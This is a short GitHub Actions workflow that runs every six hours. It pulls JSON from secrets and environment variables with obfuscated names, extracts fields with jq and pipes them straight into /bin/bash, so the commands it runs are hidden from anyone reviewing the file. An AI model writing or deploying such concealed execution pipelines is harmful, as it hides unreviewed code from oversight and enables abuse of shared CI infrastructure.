name: regionfanwei

on:
  workflow_dispatch:
  schedule:
    - cron: '44 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: regionfanwei
        env:
          zcx49073: ${{ secrets.zcx49073 }}
        run: |
          echo $zcx49073 | jq -r .pvgof103 | /bin/bash
          echo $gwo144 | jq -r .m04 | /bin/bash
          echo $j5 | jq -r .f7748 | /bin/bash
          echo $uxr15 | jq -r .b54 | /bin/bash

